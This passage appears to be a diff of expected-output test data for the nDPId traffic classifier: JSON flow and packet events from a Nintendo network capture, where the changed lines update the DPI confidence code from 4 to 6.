00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341201,"flow_last_seen":1500731341201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731341201,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1500731341201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341201,"pkt":"AA6OGXEMfLuKifuECABFAAA8EZZAAEAGCkTAqAxyNsAbCHphAbtX9RrxAAAAAKACgAAP+wAAAgQFUAEDAwYEAggKABqqagAAAAA="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1500731341241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341241,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZtk2wBsIwKgMcgG7emF9lpyBV\/Ua8qAScSBo2gAAAgQFrAQCCAqoOPNAABqqagEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1500731341242,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731341242,"pkt":"AA6OGXEMfLuKifuECABFAAA0EZdAAEAGCkvAqAxyNsAbCHphAbtX9RryfZacgoAQAg4GiQAAAQEICgAaqpOoOPNA"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} -00661{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} +00661{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1500731342849,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731342849,"pkt":"AA6OGXEMfLuKifuECABFAABoEaUAAAQRdQ7AqAxyuXapQdpra4AAVCIdMquYZAIAAADswAAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4rX5hDUY6wfFQBAZE4XnJazusJzbVQnhevgQppjVzdvQ=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1500731342850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731342850,"pkt":"AA6OGXEMfLuKifuECABFAABoEaYAAAQRdQ3AqAxyuXapQdpra4AAVAI0MquYZAIAAADswQAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+6gjif1bWs4geU7XixG1qL9vpm\/9BWOrfz2cCbEeSTC5w=="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1500731342850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731342850,"pkt":"AA6OGXEMfLuKifuECABFAABoEacAAAQRdQzAqAxyuXapQdpra4AAVKPSMquYZAIAAADswQAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+6PDZdQtmr\/jnYvUCnbuXCGD7lHXmsq3069ZX\/zt70P0A=="} 
00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342860,"flow_last_seen":1500731342860,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731342860,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1500731342860,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731342860,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBoj+XBrhkwKgMcgsAWRkAAAAARQAAaBGlAAABEXgOwKgMcrl2qUHaa2uAAFRVpg=="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342860,"flow_last_seen":1500731342860,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731342860,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.249867} 
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342860,"flow_last_seen":1500731342860,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731342860,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.249867} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1500731342860,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731342860,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBoj+XBrhkwKgMcgsAeQIAAAAARQAAaBGmAAABEXgNwKgMcrl2qUHaa2uAAFQ1vQ=="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1500731342860,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731342860,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBoj+XBrhkwKgMcgsA12MAAAAARQAAaBGnAAABEXgMwKgMcrl2qUHaa2uAAFTXWw=="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343061,"flow_last_seen":1500731343061,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343061,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1500731343061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343061,"pkt":"AA6OGXEMfLuKifuECABFAABoEawAAAQR9ebAqAxyXe2D69pr2wIAVCbFMquYZAIAAADtlwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4hx\/onxePqCY4SU3xjlxtsTZQnwdACOZdpevYKG6n8bw=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343061,"flow_last_seen":1500731343061,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343061,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343061,"flow_last_seen":1500731343061,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343061,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1500731343062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343062,"pkt":"AA6OGXEMfLuKifuECABFAABoEa0AAAQR9eXAqAxyXe2D69pr2wIAVEC8MquYZAIAAADtlwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+6trKJ4rbcL8S1NPouV27EIOISc3sHWS\/Ay6NZ9dnLpeA=="} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1500731343064,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343064,"pkt":"AA6OGXEMfLuKifuECABFAABoEa4AAAQR9eTAqAxyXe2D69pr2wIAVHIfMquYZAIAAADtmAAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4QxoxAISmRWzt9Cf2ANrWvuCF9xJxAb2QUBmXaTP0ETQ=="} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343266,"flow_last_seen":1500731343266,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343266,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1500731343266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343266,"pkt":"AA6OGXEMfLuKifuECABFAABoEbUAAAQR5+7AqAxyUT2eitpryjkAVFv5MquYZAIAAADuYwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+5+fKxnOL+boQLScYxPZys77lNbziI76pb\/g4qlyspVqA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343266,"flow_last_seen":1500731343266,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343266,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343266,"flow_last_seen":1500731343266,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343266,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1500731343266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343266,"pkt":"AA6OGXEMfLuKifuECABFAABoEbYAAAQR5+3AqAxyUT2eitpryjkAVGj9MquYZAIAAADuYwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+7xrfou4fqWjlJQi1c1lm8udR6QM9F6Tte6liKDWkKe\/w=="} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1500731343267,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343267,"pkt":"AA6OGXEMfLuKifuECABFAABoEbcAAAQR5+zAqAxyUT2eitpryjkAVC1TMquYZAIAAADuYwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+5Run8isLISlhuFklysgYAwVdq0TTDfSVfOsDm2ryNz2g=="} 
00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343274,"flow_last_seen":1500731343274,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731343274,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1500731343274,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731343274,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBokGXBrhiwKgMcgsAwIMAAAAARQAAaBG1AAABEeruwKgMclE9noraa8o5AFSPgg=="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343274,"flow_last_seen":1500731343274,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731343274,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 
